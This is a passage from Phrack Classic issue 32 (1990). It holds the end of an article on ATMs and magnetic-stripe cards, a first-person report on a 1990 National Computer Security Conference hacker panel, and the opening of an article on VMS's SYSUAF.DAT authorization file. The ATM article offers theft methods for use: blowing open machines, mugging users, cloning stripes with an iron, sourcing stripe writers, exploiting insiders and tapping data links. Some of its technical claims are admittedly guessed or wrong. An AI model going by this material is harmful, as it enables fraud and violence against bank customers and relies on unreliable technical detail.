  2975. Unfortunately the biggest drawback of this system is that people can
  2976. not manage thier own money and accounting procedures.  Millions of
  2977. times each day throughout the North American continent people are
  2978. writing checks for more money than they have in thier savings accounts.
  2979. This drawback also causes the already-backed up judicial system to
  2980. become backed up further. The banking system soon reacted to this
  2981. problem by producing 'check verification' methods to prevent people
  2982. from forgery, and overdrawing from thier accounts.
  2983.  
  2984. "Money makes the world go 'round" and there are many different ways
  2985. to make this world spin.  Today we have checking accounts, credit
  2986. cards, travelers checks, and the most 'liquid' form of money: cash.
  2987. Cash transactions are untrackable and widely accepted, so I feel
  2988. the "Paperless Society" will never happen.  Automated Teller Machines
  2989. provide consumers with 24-hour access to cash-sources.  By simply
  2990. inserting a plastic card into the machine and keypadding-in the
  2991. owners' "account password", you can access the owners bank account
  2992. and receive cash in-hand.  This file will explain some details of
  2993. the automated tellers and the plastic card used by the Teller-system.
  2994.  
  2995. The automated teller is connected by wires and cables to a "Main
  2996. Computer".  During each transaction the teller sends signals to
  2997. the main computer.  The main computer records each transaction
  2998. (a deposit or withdrawl) and updates the card-holders account.
  2999. It also sends 'approval' or 'denial' signals to the ATM in regard
  3000. to the transaction requested.  If a card-holder attempts to withdraw
  3001. $150.00 from his account and he has only $100.00 in it, the main
  3002. computer will tell the ATM to deny the transaction.
  3003.  
  3004. The ATM has 2 compartments to store cash in.  The first is the "deposits"
  3005. compartment.  This is a small area that receives the daily deposits.
  3006. It is located in the upper-part of the machine, near all the mechanical
  3007. devices.  However, because most ATM transactions are withdrawls the
  3008. complete bottom-half is filled with cash where the withdrawls are
  3009. extracted from.
  3010.  
  3011. The plastic card inserted into the machine is the same size as a
  3012. credit card.  The front of the card is embossed with information
  3013. about the card-holder.  The back-side of the card has a thin strip
  3014. of magnetic tape which also holds some important information.
  3015.  
  3016.    +--------------------------+     +--------------------------+
  3017.    ] CIRRUS                   ]     ]--------------------------]
  3018.    ]  INSTANT CASH CARD       ]     ]/////(magnetic strip)/////]
  3019.    ]                          ]     ]--------------------------]
  3020.    ] Acct: 12345675      Exp. ]     ]                          ]
  3021.    ] Joe Schmoe         01/91 ]     ] "card-holders signature" ]
  3022.    ]                          ]     ]                          ]
  3023.    +--------------------------+     +--------------------------+
  3024.           Front-side                          Back-side
  3025.  
  3026. When a cardholder inserts his card into the machine and requests a
  3027. transaction, the machine reads the embossed information from the
  3028. front-side and compares it with the data stored on the magnetic
  3029. strip; looking for a 'match' of the information on both sides.
  3030.  
  3031. The information on the front-side is easily readable with your
  3032. eyes.  However, you can not read the data on the magnetic-strip
  3033. so easily.  You may ask , "What is stored on the magnetic strip ?".
  3034. The answer is; the same information as the embossing plus some
  3035. 'confidential' information regarding the cardholders' financial
  3036. status is stored there.  The magnetic strip has 3 "tracks" on it.
  3037. The first track can store 210 BPI (Bytes per inch), and the second
  3038. stores 75 BPI, and the third stores 210 BPI.  So, we have:
  3039.  
  3040.                 +---------------------------+
  3041.    Track 1:         (210 BPI density)
  3042.                 +---------------------------+
  3043.    Track 2:         ( 75 BPI density)
  3044.                 +---------------------------+
  3045.    Track 3:         (210 BPI density)
  3046.                 +---------------------------+
  3047.  
  3048.                      THE MAGNETIC STRIP
  3049.  
  3050.  
  3051. Now, here's the information stored on each track of the strip in
  3052. my example:
  3053.  
  3054.    Track 1: " ;B 12345675 ^ Schmoe/Joe ^ ; LRC "
  3055.    Track 2: " ;12345675 01/91 ^ 1234 ^ (discriminate data) ; LRC "
  3056.    Track 3: " ;12345675 ^ 01/91 ^ 5 (discriminate data) ; LRC "
  3057.  
  3058. Here's the decoding of the above information:
  3059. Track 1:      ";" = Beginning of the data character
  3060.               "B" = Field-Control Character: I believe this character
  3061.                      tells the ATM what type of account (or status)
  3062.                      the user has.
  3063.        "12345675" = This is the account number of the cardholder.
  3064.               "^" = Data-field seperator.
  3065.      "Schmoe/Joe" = Last/First name of cardholder.
  3066.               "^" = Data-field seperator.
  3067.               ";" = End of data character.
  3068.             "LRC" = Longitude Redundancy Check (end of track character).
  3069.  
  3070. Track 2:      ";" = Beginning of data character
  3071.        "12345675" = Account number of the cardholder.
  3072.           "01/91" = Month/Year the card expires.
  3073.               "^" = Data-field seperator.
  3074.            "1234" = Process Identification Number (The cardholders 'password',
  3075.                      I think... or it could be a number to verify the
  3076.                      the transaction between the ATM and the Main Computer).
  3077.               "^" = Data-field seperator
  3078.  "(dscrmn. data)" = Discriminate Data. Not much is known exactly what is
  3079.                      stored here. Perhaps Bank Identification data or
  3080.                      bank account type (savings, checking?) ?
  3081.               ";" = End of data character.
  3082.             "LRC" = Longitude Redundancy Check.
  3083.  
  3084. Track 3:      ";" = Beginning of data character.
  3085.        "12345675" = Account number of the cardholder.
  3086.               "^" = Data-field seperator.
  3087.           "01/91" = Month/Year the card expires.
  3088.               "^" = Data-field seperator.
  3089.               "5" = The crypting-digit. When the transaction request
  3090.                      is sent to the main computer, it is encrypted.
  3091.                      This digit tells which encryption-key is used.
  3092.  "(dscrmn. data)" = A duplicate of the discriminate data stored on
  3093.                      Track 2.
  3094.               ";" = End of data character.
  3095.             "LRC" = Longitude Redundancy Check.
  3096.  
  3097. When the card is being processed the ATM tries to match the
  3098. account number, expiration date and name stored on each track.
  3099. The reason they duplicate data is for verification purposes. But,
  3100. notice that the duplicate data is stored on different tracks, each
  3101. having different recording densities.  Once the information on the
  3102. tracks are confirmed to match, the ATM compares them to the embossed
  3103. information on the front-side.  If all of the information matches
  3104. then the transaction will proceed.  If it doesn't match, then the card
  3105. is considered to be damaged and the ATM will keep the card.  It will
  3106. give the cardholder a piece of paper instructing the user to notify
  3107. the bank who issued his ATM-card so he can receive a replacement
  3108. card in the mail (this process takes about 3 weeks).
  3109.  
  3110.  
  3111. Now that you know how the ATM-system is designed and what information
  3112. is kept where on the card, what "security defects" does this system
  3113. contain ?  I will outline 4 methods of attacking this system that
  3114. have been tried (not by me!).
  3115.  
  3116.   1) Vandalization:  If you want, you can break-in to the ATM.
  3117.      However, most ATM's contain 'sensor' devices which sound an
  3118.      alarm when this is tried.  Therefore, if you're going to try
  3119.      this method I do not suggest using a hammer and chisel on the
  3120.      ATM because it will take 1/2 an hour to get the machine open
  3121.      and by that time the police will be there.  You could try a
  3122.      much faster way, dynamite; but that might scatter the money
  3123.      all-over, making it hard to collect.  Also, the bottom-half
  3124.      is where most of the money is stored (unless you happen to
  3125.      choose a machine that has issued all of its withdrawl-cash)
  3126.      so you'll want to break into the bottom-half of the ATM.
  3127.  
  3128.      In relation to this, you could wait outside the ATM for a
  3129.      valid-user to complete his withdrawl-transaction and mug him.
  3130.      As far as I know, the bank holds no responsibilty for placing
  3131.      the ATM in a 'secure' enviroment.  However, usually they will
  3132.      have lights nearby and placed in 'reasonable' places where
  3133.      people need money (example: Grocery store) and where the chance
  3134.      of mugging is slim.
  3135.  
  3136.  
  3137.   2) Physical Penetration: There are several ways of doing this.
  3138.      If you have a stolen card, you could randomly try guessing his
  3139.      account-password.  But, I feel this is a primitive method.
  3140.      If you try too many attempts at guessing the 'password',
  3141.      the ATM will return the card to you.  But, your attempts
  3142.      *might* be recorded in the central computer; allowing the
  3143.      bank to decide whether to cancel that card... However,
  3144.      this has not been verified by me.  If you do get a cash-card,
  3145.      you can make counterfeit-cards.
  3146.  
  3147.      A) Counterfiet ATM-cards:  The same method for producing
  3148.         counterfiet credit cards applies to ATM-cards.  If you
  3149.         have a valid ATM-card you can 'clone' it simply by embossing
  3150.         a blank-card with the same information.  Copying the mag-
  3151.         netic strip is also easy. To do this, you place a blank
  3152.         strip of the magnetic tape on top of the valid magnetic
  3153.         strip.  Then, using an iron on low-heat, gently rub the
  3154.         iron across the two strips for a few seconds.  Lastly,
  3155.         peel the new strip apart from the valid one and you've
  3156.         got a copy of all the data from the valid ATM-card.
  3157.  
  3158.      B) Also, I've heard a case where some guys had a machine
  3159.         that could read and write to the magnetic strips (probably
  3160.         they were employees of a company that produces the ATM-cards).
  3161.         Using this machine, they were able to create and change
  3162.         existing data on ATM-cards (such as the expiration date
  3163.         so they could keep using the same card over a long period
  3164.         of time).
  3165.  
  3166.         In relation to this there are other devices available that
  3167.         can read and write to magnetic strips.  Using your own
  3168.         microcomputer, you can buy a device that allows you to
  3169.         read and write to these magnetic strips. It looks
  3170.         similar to a disk drive.  If you're interested in
  3171.         exploring this method, I'll suggest that you contact
  3172.         the following company:
  3173.  
  3174.                  American Magnetics Corporation
  3175.                  740 Watsoncenter Road
  3176.                  Carson, California   90745
  3177.                  USA
  3178.  
  3179.                  213/775-8651
  3180.                  213/834-0685  FAX
  3181.                  910-345-6258  TWX
  3182.  
  3183.      C) WARNING: During each transaction attempted on an ATM a
  3184.         photo of the person requesting the transaction is taken.
  3185.         How long this film is stored is unknown, but it probably
  3186.         is different for each bank (unless there is a federal
  3187.         regulation regarding this).  Also, it is possible that
  3188.         this is not done at all ATMs.
  3189.  
  3190.   3) "Insider" Theft: The above case also crosses over into this
  3191.       section.  The biggest 'security leaks' in any company are
  3192.       its employees.  This is also the easiest way to steal money
  3193.       from ATMs.  The man who collects the deposits from the machine
  3194.       and inserts cash for withdrawls has the easiest and most
  3195.       open access to these machines.  I was told that this person
  3196.       can easily steal money from ATMs and not be detected.  Another
  3197.       person with access to these machines is the technician. The
  3198.       technician who fixes ATMs is the most-knowledgeable person
  3199.       about ATMs within the bank, therefore he should be a trust-
  3200.       worthy guy and receive a 'comfortable' salary.. otherwise
  3201.       he'll begin to collect 'retirement benefits' from the ATM
  3202.       and this may go undetected.
  3203.  
  3204.       However, I have heard of some embezzlement-cases involving ATMs,
  3205.       so I think it's not as easy as it seems.  It's only common sense
  3206.       that a bank would account for every dollar of every transaction.
  3207.       Whether the accounting is done inside the ATM or the main
  3208.       computer doesn't make a difference...  some form of accounting
  3209.       is *probably* done.
  3210.  
  3211.   4) Data-link Intercept:  This method has been very successful.  What
  3212.      you do is 'tap' into the wires that connect the ATM to the Main
  3213.      computer.  By doing this you can intercept and send signals to
  3214.      the ATM.  However, some 'inside information' is needed because
  3215.      the transmission is encrypted (refer to the Cryptography Digit
  3216.      stored on the magnetic strip).  But, I think you don't need to
  3217.      know *everything* being transferred.  You should need to know
  3218.      when to send the 'approval' signal to the ATM telling it to
  3219.      dispense its' cash.  I read a case (it may be in Phrack World
  3220.      News; 1985?) where some guys netted $600,000 from various ATMs
  3221.      using this method.  This seems to be one of the better, and
  3222.      more ingenious methods of stealing from these machines.
  3223.  
  3224.  
  3225. The information in this file should be 'adequate' to introduce you
  3226. to how ATMs work.  How did I get this information?  I went into a
  3227. bank and inquired about the computer-technology of ATMs.  The man
  3228. who was responsible for the ATMs was a bureaucrat and actually knew
  3229. very little about the 'guts' of ATMs.   Luckily the ATM-technician
  3230. was there that day and I agreed to buy him dinner later that evening.
  3231. (Please refer to: "Insider" Theft and the principle of Company-Loyalty).
  3232. During the dinner at "Toppers" (a neat 1950's Burgers/Milkshake/Beer
  3233. restaurant) he provided me with Operation and Repair manuals for the
  3234. ATMs.  I feel this information is well-worth the $3.82 dinner and
  3235. will be of some value to its' readers.  Some good information was
  3236. screened-out due to its 'delicate nature', but the information I've
  3237. provided has been confirmed.
  3238.  
  3239.  
  3240. +---------+
  3241. ] CREDITS ]
  3242. +---------+
  3243. The Mentor (Phrack #8, File #7;  "Fun with Automatic Tellers")
  3244. Deserted Surfer
  3245. Hyudori
  3246. Lex Luthor
  3247.  
  3248. Please distribute this file in its complete form.
  3249.  
  3250. _______________________________________________________________________________
  3251.  
  3252.                               ==Phrack Classic==
  3253.  
  3254.                      Volume Three, Issue 32, File #7 of 12
  3255.  
  3256.  
  3257. 13th Annual National Computer Security Conference
  3258. October 1-4, 1990
  3259. Omni Shoreham Hotel
  3260. Washington, D.C.
  3261. A "Knight Lightning" Perspective
  3262. by Craig M. Neidorf
  3263.  
  3264. Dr. Dorothy Denning first hinted at inviting me to take part on her panel
  3265. "Hackers:  Who Are They?" in May 1990 when we first came into contact while
  3266. preparing for my trial.  At the time I did not feel that it was a very good
  3267. idea since no one knew what would happen to me over the next few months.  At
  3268. the conclusion of my trial I agreed to participate and surprisingly, my
  3269. attorney, Sheldon Zenner (of Katten, Muchin, & Zavis), accepted an invitation
  3270. to speak as well.
  3271.  
  3272. A few weeks later there was some dissension to the idea of having me appear at
  3273. the conference from some professionals in the field of computer security.  They
  3274. felt that my presence at such a conference undermined what they stood for and
  3275. would be observed by computer "hackers" as a reward of sorts for my notoriety
  3276. in the hacker community.  Fortunately Dr. Denning stuck to her personal values
  3277. and did not exclude me from speaking.
  3278.  
  3279. Unlike Gordon Meyer, I was unable to attend Dr. Denning's presentation
  3280. "Concerning Hackers Who Break Into Computer Systems" and the ethics sessions,
  3281. although I was informed upon my arrival of the intense interest from the
  3282. conference participants and the reactions to my now very well known article
  3283. announcing the "Phoenix Project."
  3284.  
  3285. Not wishing to miss any more class than absolutely necessary, I arrived in
  3286. Washington D.C. late in the day on Wednesday, October 4th.  By some bizarre
  3287. coincidence I ended up on the same flight with Sheldon Zenner.
  3288.  
  3289. I had attended similar conventions before such as the Zeta Beta Tau National
  3290. Convention in Baltimore the previous year, but there was something different
  3291. about this one.  I suppose considering what I have been through it was only
  3292. natural for me to be a little uneasy when surrounded by computer security
  3293. professionals, but oddly enough this feeling soon passed as I began to
  3294. encounter friends both old and new.
  3295.  
  3296. Zenner and I met up with Dorothy and Peter Denning and soon after I met Terry
  3297. Gross, an attorney hired by the Electronic Frontier Foundation who had helped
  3298. with my case in reference to the First Amendment issues.  Emmanuel Goldstein,
  3299. editor of 2600 Magazine and probably the chief person responsible for spreading
  3300. the news and concern about my indictment last Spring, and Frank Drake, editor
  3301. of W.O.R.M. showed up.  I had met Drake once before.  Finally I ran into Gordon
  3302. Meyer.
  3303.  
  3304. So for a while we all exchanged stories about different events surrounding our
  3305. lives and how things had changed over the years only to be interrupted once by
  3306. a odd gentleman from Germany who inquired if we were members of the Chaos
  3307. Computer Club.  At the banquet that evening, I was introduced to Peter Neumann
  3308. (who among many other things is the moderator of the Internet Digest known as
  3309. "RISKS") and Marc Rotenberg (Computer Professionals for Social Responsibility).
  3310.  
  3311. Because of the great interest in the ethics sessions and comments I had heard
  3312. from people who had attended, I felt a strange irony come into play.  I've
  3313. hosted and attended numerous "hacker" conventions over the years, the most
  3314. notable being "SummerCon".  At these conventions one of the main time consuming
  3315. activities has always been to play detective and attempt to solve the mystery
  3316. of which one of the guests or other people at the hotel were there to spy on us
  3317. (whether they were government agents or some other form of security personnel).
  3318.  
  3319. So where at SummerCon the youthful hackers were all racing around looking for
  3320. the "feds," at the NCSC I wondered if the security professionals were reacting
  3321. in an inverse capacity... Who Are The Hackers?  Despite this attitude or maybe
  3322. because of it, I and the other panelists, wore our nametags proudly with a
  3323. feeling of excitement surrounding us.
  3324.  
  3325. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3326.  
  3327. October 4, 1990
  3328.  
  3329. Dorothy Denning had gathered the speakers for an early morning brunch and I
  3330. finally got a chance to meet Katie Hafner in person.  The panelists discussed
  3331. some possibilities of discussion questions to start off the presentation and
  3332. before I knew it, it was time to meet the public.
  3333.  
  3334. As we gathered in the front of the conference room, I was dismayed to find that
  3335. the people in charge of the setting up the nameboards (that would sit in front
  3336. of each panelist) had attended the Cook school of spelling and labeled me as
  3337. "Neirdorf."  Zenner thought this was hysterical.  Luckily they were able to
  3338. correct the error before we began.
  3339.  
  3340.                             Hackers:  Who Are They?
  3341.  
  3342. Dr. Denning started the presentation by briefly introducing each panelist and
  3343. asking them a couple of questions.
  3344.  
  3345. Katie Hafner disputed the notion that her work has caused a glorification
  3346. of hacking because of the severe hardships the people she interviewed had to
  3347. endure.  I found myself sympathizing with her as I knew what it was like to
  3348. be in their positions.  Many people commented later that her defense of Mitnick
  3349. seemed a little insincere as he had indeed committed some serious acts.  Not
  3350. knowing all of the details surrounding Mitnick's case and not relying on the
  3351. general newsmedia as a basis for opinion I withheld any sort of judgment.
  3352.  
  3353. Emmanuel Goldstein and Frank Drake appeared to take on the mantle of being the
  3354. spokespersons for the hackers, although I'm unsure if they would agree with
  3355. this characterization.  Drake's main point of view dealt with the idea that
  3356. young hackers seek to be able to use resources that they are otherwise excluded
  3357. from.  He claimed to once have been a system intruder, but now that he is in
  3358. college and has ample computing resources available to him, he no longer sees a
  3359. need to "hack."
  3360.  
  3361. Goldstein on the other hand sought to justify hacking as being beneficial to
  3362. society because the hackers are finding security holes and alerting security to
  3363. fix these problems before something catastrophic occurs.
  3364.  
  3365. Gordon Meyer tried to explain the hacker mind-set and how the average hackers
  3366. does not see using corporate resources as having a real financial burden to
  3367. today's companies.  Some people misunderstood his remarks to be speaking from a
  3368. factual position and took offense, stating that the costs are great indeed.
  3369. He also explained the differences between Phrack and the Computer Underground
  3370. Digest.  Most notable is that CuD does not print tutorials about computer
  3371. systems.
  3372.  
  3373. Sheldon Zenner focused on the freedom of the speech and press issues.  He also
  3374. spoke about technical details of the U.S. v. Neidorf case and the court rulings
  3375. that resulted from it.  One major point of interest was his quite reasonable
  3376. belief that the courts will soon be holding companies financially liable for
  3377. damages that may occur because of illegal intrusion into their systems.  This
  3378. was not to suggest that a criminal defense strategy could be that a company did
  3379. not do enough to keep an intruder out, but instead that the company could be
  3380. held civilly liable by outside parties.
  3381.  
  3382. Zenner and Denning alike discussed the nature of Phrack's articles.  They found
  3383. that the articles appearing in Phrack contained the same types of material
  3384. found publicly in other computer and security magazines, but with one
  3385. significant difference.  The tone of the articles.  An article named "How to
  3386. Hack Unix" in Phrack usually contained very similar information to an article
  3387. you might see in Communications of the ACM only to be named "Securing Unix
  3388. Systems."  But the differences were more extreme than just the titles.  Some
  3389. articles in Phrack seemed to suggest exploiting security holes while the
  3390. Communications of the ACM concentrated more on fixing the problem.  The
  3391. information in both articles would be comparable, but the audiences reading and
  3392. writing these articles were often very different.
  3393.  
  3394. I explained the concept and operation of Phrack and wandered into a discussion
  3395. about lack of privacy concerning electronic mail on the Internet from
  3396. government officials, system managers, and possibly even by hackers.  I went on
  3397. to remark that the security professionals were missing the point and the
  3398. problem.  The college and high-school students while perhaps doing some
  3399. exploration and causing some slight disturbances are not the place to be
  3400. focusing their efforts.  The real danger comes from career criminals and
  3401. company insiders who know the systems very well from being a part of it.  These
  3402. people are the source of computer crime in this country and are the ones who
  3403. need to be dealt with.  Catching a teenage hacker may be an easier task, but
  3404. ultimately will change nothing.  To this point I agreed that a hacker gaining
  3405. entry and exposing holes on computer systems may be a service to some degree,
  3406. but unlike Goldstein, I could not maintain that such activity should bring
  3407. prosecutorial immunity to the hacker. This is a matter of discretion for
  3408. security personnel and prosecutors to take into consideration.  I hope they do.
  3409.  
  3410. To a large degree I was rather silent on stage.  Perhaps because I was cut off
  3411. more than once or maybe even a little stagefright, but largely because many of
  3412. the questions posed by the audience were wrong on their face for me to answer.
  3413. I was not going to stand and defend hacking for its own sake nor was I there to
  3414. explain the activities of every hacker in existence.
  3415.  
  3416. So I let Goldstein and Drake handle questions geared to be answered by a system
  3417. intruder and I primarily only spoke out concerning the First Amendment and
  3418. Phrack distribution.  In one instance a man upset both by Drake's comments
  3419. about how the hackers just want to use resources they can't get elsewhere and
  3420. by Goldstein's presentation of the Operation Sun-Devil raids and the attack on
  3421. "Zod" in New York spoke up and accused us of being viciously one sided.
  3422.  
  3423. He said that none of us (and he singled me out specifically) look to be age 14
  3424. (he said he could believe I was 18) and that "our" statement that its ok for
  3425. hackers to gain access to systems simply because they lacked the resources
  3426. elsewhere meant it was ok for kids to steal money to buy drugs.
  3427.  
  3428. I responded by asking him if he was suggesting that if these "kids" were rich
  3429. and did not steal the money, it would be ok to purchase drugs?  I was sure that
  3430. it was just a bad analogy so I changed the topic afterwards.  He was right to a
  3431. certain extent, all of the hackers are not age 14 or even in highschool or
  3432. college, but is this really all that important of a distinction?
  3433.  
  3434. The activities of the Secret Service agents and other law enforcement officials
  3435. in Operation Sun-Devil and other investigations have been overwhelming and very
  3436. careless.  True this is just their standard way of doing business and they may
  3437. not have even singled out the hackers as a group to focus excess zeal, but
  3438. recognizing that the hackers are in a worst case scenario "white-collar
  3439. offenders," shouldn't they alter their technique?  Something that might be
  3440. important to make clear is that in truth my indictment and the indictments on
  3441. members of the Legion of Doom in Atlanta had absolutely nothing to do with
  3442. Operation Sun-Devil despite the general media creation.
  3443.  
  3444. Another interesting point that was brought out at the convention was that there
  3445. was so much activity and the Secret Service kept so busy in the state of
  3446. Arizona (possibly by some state official) concerning the hacker "problem" that
  3447. perhaps this is the reason the government did not catch on to the great Savings
  3448. & Loan multi-Billion dollar loss.
  3449.  
  3450. One gentleman spoke about his son being in a hospital where all his treatments
  3451. were being run by computer.  He added that a system intruder might quite by
  3452. accident disrupt the system inadvertently endangering his son's life.  Isn't
  3453. this bad?  Obviously yes it is bad, but what was worse is that a critical
  3454. hospital computer system would be hooked up to a phoneline anyway.  The main
  3455. reason for treatment in a hospital is so that the doctors are *there* to
  3456. monitor and assist patients.  Could you imagine a doctor dialing in from home
  3457. with a modem to make his rounds?
  3458.  
  3459. There was some discussion about an editor's responsibility to inform
  3460. corporations if a hacker were to drop off material that he/she had breached
  3461. their security.  I was not entirely in opposition to the idea, but the way I
  3462. would propose to do it was probably in the pages of a news article.  This may
  3463. seem a little roundabout, but when you stop and consider all of the private
  3464. security consultants out there, they do not run around providing information to
  3465. corporations for free.  They charge enormous fees for their services.  There
  3466. are some organizations that do perform services for free (CERT comes to mind),
  3467. but that is the reason they were established and they receive funding from the
  3468. government which allows them to be more generous.
  3469.  
  3470. It is my belief that if a hacker were to give me some tips about security holes
  3471. and I in turn reported this information to a potential victim corporation, the
  3472. corporation would be more concerned with how and from whom I got the
  3473. information than with fixing the problem.
  3474.  
  3475. One of the government's expert witnesses from U.S. v. Neidorf attended this
  3476. session and he prodded Zenner and I with questions about the First Amendment
  3477. that were not made clear from the trial.  Zenner did an excellent job of
  3478. clarifying the issues and presenting the truth where this Bellcore employee
  3479. sought to show us in a poor light.
  3480.  
  3481. During the commentary on the First Amendment, Hafner, Zenner, and I discussed a
  3482. July 22, 1988 article containing a Pacific Bell telephone document copied by a
  3483. hacker and sent to John Markoff that appeared on the front page of the New York
  3484. Times.  A member of the audience said that this was ok, but the Phrack article
  3485. containing the E911 material was not because Phrack was only sent to hackers.
  3486. Zenner went on to explain that this was far from true since private security,
  3487. government employees, legal scholars, reporters, and telecom security personnel
  3488. all received Phrack without discrimination.  There really is a lot that both
  3489. the hackers and security professionals have to learn about each other.
  3490.  
  3491. It began to get late and we were forced to end our session.  I guess what
  3492. surprised me the most were all of the people that stayed behind to speak with
  3493. us.  There were representatives from NASA, U.S. Sprint, Ford Aerospace, the
  3494. Department of Defense, a United States Army Lt. Colonel who all thanked us
  3495. for coming to speak.  It was a truly unique experience in that a year ago I
  3496. would have presumed these people to be fighting against me and now it seems
  3497. that they are reasonable, decent people, with an interest in trying to learn
  3498. and help end the problems.  I also met Mrs. Gail Meyer for the first time in
  3499. person as well.
  3500.  
  3501. I was swamped with people asking me how they could get Phrack and for the most
  3502. part I referred them to Gordon Meyer and CuD (and the CuD ftp).  Just before we
  3503. went to lunch I met Donn Parker and Art Brodsky, an editor from Communications
  3504. Daily.  So many interesting people to speak with and so little time.  I spent a
  3505. couple hours at the National Gallery of Art with Emmanuel Goldstein, flew back
  3506. to St. Louis, and returned to school.
  3507.  
  3508. It was definitely an enLightening experience.
  3509.  
  3510. ++++++++++++++++++++++++++++++
  3511.  
  3512. A very special thank you goes to Dorothy Denning, a dear friend who made it
  3513. possible for me to attend the conference.
  3514.  
  3515. :Craig M. Neidorf a/k/a Knight Lightning
  3516.  
  3517.  C483307 @ UMCVMB.MISSOURI.EDU
  3518.  C483307 @ UMCVMB.BITNET
  3519. _______________________________________________________________________________
  3520.  
  3521.                               ==Phrack Classic==
  3522.  
  3523.                      Volume Three, Issue 32, File #8 of 12
  3524.  
  3525.  
  3526.                        +-------------------------------+
  3527.                        | Inside the SYSUAF.DAT file of |
  3528.                        +-------------------------------+
  3529.  
  3530.            +------------------------------------------------------+
  3531.            | Digital Equipment Corporation's VMS Operating System |
  3532.            +------------------------------------------------------+
  3533.  
  3534.                                    -= by =-
  3535.  
  3536.                          -----:>  Pain Hertz  <:----
  3537.  
  3538.  
  3539.  
  3540. Overview
  3541. ~~~~~~~~
  3542.         In this file, I will explain what the System User Authorization File
  3543. is, what information it contains, what the logical and physical characteristics
  3544. of the file are, and how one can manipulate it to reveal and/or modify its
  3545. contents.
  3546.  
  3547. Background
  3548. ~~~~~~~~~
  3549.         The Virtual Memory System (VMS) Operating System's System User
  3550. Authorization File (SYSUAF) contains the information that determines a given
  3551. user's username, password(s), security priviledges, as well as many other
  3552. similar data which either allow or disallow the user to have the system
  3553. perform certain tasks.
  3554.  
  3555. Characteristics
  3556. ~~~~~~~~~~~~~~~
  3557.         The SYSUAF.DAT file (UAF) is usually located on the system on the
  3558. device pointed to by the logical SYS$COMMON, and under the [SYSEXE]
  3559. subdirectory.  However, if the logical SYSUAF exists, it will point to the
  3560. location and name of the UAF.
  3561.  
  3562.         The UAF is a binary, indexed data file.  It's indexed on 4 keys:
  3563. username, UIC, extended user identifier, and owner identifier.  Using
  3564. the VMS ANALYZE utility reveals the following about the UAF:
  3565.  
  3566.  
  3567. IDENT   "01-JAN-1990 13:13:13   VAX/VMS ANALYZE/RMS_FILE Utility"
  3568.  
  3569. SYSTEM
  3570.         SOURCE                  VAX/VMS
  3571.  
  3572. FILE
  3573.         ALLOCATION              24
  3574.         BEST_TRY_CONTIGUOUS     yes
  3575.         BUCKET_SIZE             3
  3576.         CLUSTER_SIZE            3
  3577.         CONTIGUOUS              no
  3578.         EXTENSION               3
  3579.         FILE_MONITORING         no
  3580.         GLOBAL_BUFFER_COUNT     0
  3581.         NAME                    "SYS$COMMON:[SYSEXE]SYSUAF.DAT;1"
  3582.         ORGANIZATION            indexed
  3583.         OWNER                   [SYSTEM]
  3584.         PROTECTION              (system:RWED, owner:RWED, group:RWED, world:RE)
  3585.  
  3586. RECORD
  3587.         BLOCK_SPAN              yes
  3588.         CARRIAGE_CONTROL        none
  3589.         FORMAT                  variable
  3590.         SIZE                    1412
  3591.  
  3592. AREA 0
  3593.         ALLOCATION              9
  3594.         BEST_TRY_CONTIGUOUS     yes
  3595.         BUCKET_SIZE             3
  3596.         EXTENSION               3
  3597.  
  3598. AREA 1
  3599.         ALLOCATION              3
  3600.         BUCKET_SIZE             3
  3601.         EXTENSION               3
  3602.  
  3603. AREA 2
  3604.         ALLOCATION              12
  3605.         BUCKET_SIZE             2
  3606.         EXTENSION               12
  3607.  
  3608. KEY 0
  3609.         CHANGES                 no
  3610.         DATA_KEY_COMPRESSION    yes
  3611.         DATA_RECORD_COMPRESSION yes
  3612.         DATA_AREA               0
  3613.         DATA_FILL               100
  3614.         DUPLICATES              no
  3615.         INDEX_AREA              1
  3616.         INDEX_COMPRESSION       yes
  3617.         INDEX_FILL              100
  3618.         LEVEL1_INDEX_AREA       1
  3619.         NAME                    "Username"
  3620.         NULL_KEY                no
  3621.         PROLOG                  3
  3622.         SEG0_LENGTH             32
  3623.         SEG0_POSITION           4
  3624.         TYPE                    string
  3625.  
  3626. KEY 1
  3627.         CHANGES                 yes
  3628.         DATA_KEY_COMPRESSION    no
  3629.         DATA_AREA               2
  3630.         DATA_FILL               100
  3631.         DUPLICATES              yes
  3632.         INDEX_AREA              2
  3633.         INDEX_COMPRESSION       no
  3634.         INDEX_FILL              100
  3635.         LEVEL1_INDEX_AREA       2
  3636.         NAME                    "UIC"
  3637.         NULL_KEY                no
  3638.         SEG0_LENGTH             4
  3639.         SEG0_POSITION           36
  3640.         TYPE                    bin4
  3641.  
  3642. KEY 2
  3643.         CHANGES                 yes
  3644.         DATA_KEY_COMPRESSION    no
  3645.         DATA_AREA               2
  3646.         DATA_FILL               100
  3647.         DUPLICATES              yes
  3648.         INDEX_AREA              2
  3649.         INDEX_COMPRESSION       no
  3650.         INDEX_FILL              100
  3651.         LEVEL1_INDEX_AREA       2
  3652.         NAME                    "Extended User Identifier"
  3653.         NULL_KEY                no
  3654.         SEG0_LENGTH             8
  3655.         SEG0_POSITION           36
  3656.         TYPE                    bin8
  3657.  
  3658. KEY 3
  3659.         CHANGES                 yes
  3660.         DATA_KEY_COMPRESSION    no
  3661.         DATA_AREA               2
  3662.         DATA_FILL               100
  3663.         DUPLICATES              yes
  3664.         INDEX_AREA              2
  3665.         INDEX_COMPRESSION       no
  3666.         INDEX_FILL              100
  3667.         LEVEL1_INDEX_AREA       2
  3668.         NAME                    "Owner Identifier"
  3669.         NULL_KEY                yes
  3670.         NULL_VALUE              0
  3671.         SEG0_LENGTH             8
  3672.         SEG0_POSITION           44
  3673.         TYPE                    bin8
  3674.  
  3675. ANALYSIS_OF_AREA 0
  3676.         RECLAIMED_SPACE         0
  3677.  
  3678. ANALYSIS_OF_AREA 1
  3679.         RECLAIMED_SPACE         0
  3680.  
  3681. ANALYSIS_OF_AREA 2
  3682.         RECLAIMED_SPACE         0
  3683.  
  3684. ANALYSIS_OF_KEY 0
  3685.         DATA_FILL               71
  3686.         DATA_KEY_COMPRESSION    75
  3687.         DATA_RECORD_COMPRESSION 67
  3688.         DATA_RECORD_COUNT       5
  3689.         DATA_SPACE_OCCUPIED     3
  3690.         DEPTH                   1
  3691.         INDEX_COMPRESSION       85
  3692.         INDEX_FILL              1
  3693.         INDEX_SPACE_OCCUPIED    3
  3694.         LEVEL1_RECORD_COUNT     1
  3695.         MEAN_DATA_LENGTH        644
  3696.         MEAN_INDEX_LENGTH       34
  3697.  
  3698. ANALYSIS_OF_KEY 1
  3699.         DATA_FILL               7
  3700.         DATA_KEY_COMPRESSION    0
